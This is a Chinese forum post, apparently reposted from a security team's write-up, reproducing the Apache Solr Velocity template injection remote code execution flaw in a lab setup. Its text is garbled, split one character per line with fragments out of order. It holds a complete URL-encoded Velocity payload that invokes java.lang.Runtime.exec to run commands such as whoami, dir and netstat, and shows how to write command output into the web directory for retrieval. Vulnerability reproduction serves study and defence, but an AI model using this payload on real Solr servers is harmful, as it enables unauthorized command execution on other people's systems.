论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
代码执行
[5] 2021-03-12_ApacheSolrVelocity模板注入RCE漏洞复现
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-15
代码执行
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-03-12_ApacheSolrVelocity模板注入RCE漏洞复现
A
p
a
c
h
e
S
o
l
r
V
e
l
o
c
i
t
y
模
板
注
入
R
C
E
漏
洞
复
现
g
u
o
g
u
o
3
h
安
全
团
队
2
0
2
1
-
0
3
-
1
2
1
、
漏
洞
概
述
s
o
l
r
存
在
V
e
l
o
c
i
t
y
R
e
s
p
o
n
s
e
W
r
i
t
e
r
组
件
,
攻
击
者
可
以
构
造
特
定
请
求
修
改
配
置
文
件
,
使
V
e
l
o
c
i
t
y
R
e
s
p
o
n
s
e
W
r
i
t
e
r
组
件
允
许
加
载
指
定
模
板
,
进
而
导
致
V
e
l
o
c
i
t
y
模
版
注
入
远
程
命
令
执
行
漏
洞
。
2
、
影
响
版
本
3
、
漏
洞
环
境
搭
建
及
其
复
现
3
.
1
、
环
境
搭
建
(
1
)
准
备
j
a
v
a
环
境
(
2
)
下
载
A
p
a
c
h
e
S
o
l
r
8
.
2
.
0
下
载
地
址
:
(
3
)
启
动
环
境
(
4
)
访
问
3
.
2
、
漏
洞
复
现
(
1
)
在
/
s
e
r
v
e
r
/
s
o
l
r
/
目
录
下
手
动
创
建
t
e
s
t
的
文
件
夹
,
将
/
c
o
n
f
i
g
s
e
t
s
/
_
d
e
f
a
u
l
t
/
下
的
c
o
n
f
目
录
拷
贝
到
t
e
s
t
目
录
下
(
2
)
创
建
一
个
名
为
t
e
s
t
的
c
o
r
e
(
3
)
浏
览
器
访
问
/
s
o
l
r
/
t
e
s
t
/
c
o
n
f
i
g
,
查
看
配
置
A
p
a
c
h
e
S
o
l
r
5
.
x
-
8
.
2
.
0
h
t
t
p
s
:
/
/
w
w
w
.
a
p
a
c
h
e
.
o
r
g
/
d
y
n
/
c
l
o
s
e
r
.
l
u
a
/
l
u
c
e
n
e
/
s
o
l
r
/
8
.
2
.
0
/
s
o
l
r
-
8
.
2
.
0
.
z
i
p
(
4
)
修
改
配
置
,
将
f
a
l
s
e
改
为
t
r
u
e
(
5
)
构
造
p
a
y
l
o
a
d
实
现
r
c
e
若
是
想
查
看
有
哪
些
文
件
呢
?
肯
定
会
想
到
直
接
把
命
令
改
变
为
d
i
r
。
但
是
为
什
么
会
是
5
0
0
呢
?
原
因
是
d
i
r
未
加
入
系
统
环
境
变
量
所
以
为
了
解
决
这
个
办
法
,
需
要
在
前
面
加
上
c
m
d
.
e
x
e
/
c
,
,
所
以
就
改
为
若
是
c
m
d
.
e
x
e
/
c
n
e
t
s
t
a
t
-
a
n
o
,
超
时
导
致
不
能
回
显
,
我
们
可
以
通
过
>
符
号
,
把
它
输
入
到
一
个
文
件
里
面
,
查
看
内
容
p
a
y
l
o
a
d
如
下
:
s
e
l
e
c
t
?
q
=
1
&
&
w
t
=
v
e
l
o
c
i
t
y
&
v
.
t
e
m
p
l
a
t
e
=
c
u
s
t
o
m
&
v
.
t
e
m
p
l
a
t
e
.
c
u
s
t
o
m
=
%
2
3
s
e
t
(
$
x
=
%
2
7
%
2
7
)
+
%
2
3
s
e
t
(
$
r
t
=
$
x
.
c
l
a
s
s
.
f
o
r
N
a
m
e
(
%
2
7
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
%
2
7
)
)
+
%
2
3
s
e
t
(
$
c
h
r
=
$
x
.
c
l
a
s
s
.
f
o
r
N
a
m
e
(
%
2
7
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
%
2
7
)
)
+
%
2
3
s
e
t
(
$
s
t
r
=
$
x
.
c
l
a
s
s
.
f
o
r
N
a
m
e
(
%
2
7
j
a
v
a
.
l
a
n
g
.
S
t
r
i
n
g
%
2
7
)
)
+
%
2
3
s
e
t
(
$
e
x
=
$
r
t
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
%
2
7
w
h
o
a
m
i
%
2
7
)
)
+
$
e
x
.
w
a
i
t
F
o
r
(
)
+
%
2
3
s
e
t
(
$
o
u
t
=
$
e
x
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
)
+
%
2
3
f
o
r
e
a
c
h
(
$
i
+
i
n
+
[
1
.
.
$
o
u
t
.
a
v
a
i
l
a
b
l
e
(
)
]
)
$
s
t
r
.
v
a
l
u
e
O
f
(
$
c
h
r
.
t
o
C
h
a
r
s
(
$
o
u
t
.
r
e
a
d
(
)
)
)
%
2
3
e
n
d
c
m
d
.
e
x
e
%
2
0
%
2
F
c
%
2
0
d
i
r
%
2
7
c
m
d
.
e
x
e
/
c
-
n
n
e
t
s
t
a
t
-
a
n
o
>
f
e
n
z
h
o
u
.
t
x
t
虽
然
状
态
码
还
是
5
0
0
,
但
是
其
实
已
经
实
现
成
功
了
其
实
s
o
l
r
的
w
e
b
目
录
是
s
o
l
r
-
7
.
5
.
0
s
o
l
r
s
e
r
v
e
r
s
o
l
r
-
w
e
b
a
p
p
w
e
b
a
p
p
、
我
们
就
可
以
构
造
命
令
然
后
直
接
w
e
b
访
问
由
于
传
播
、
利
用
此
文
所
提
供
的
信
息
而
造
成
的
任
何
直
接
或
者
间
接
的
后
果
及
损
失
,
均
由
使
用
者
本
人
负
责
,
3
h
安
全
团
队
以
及
文
章
作
者
不
为
此
承
担
任
何
责
任
。
感
谢
关
注
!
感
谢
关
注
!
c
m
d
.
e
x
e
/
c
n
e
t
s
t
a
t
-
a
n
o
>
.
/
s
o
l
r
-
w
e
b
a
p
p
/
w
e
b
a
p
p
/
f
e
i
z
h
o
u
m
o
l
i
2
.
t
x
t
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
代码执行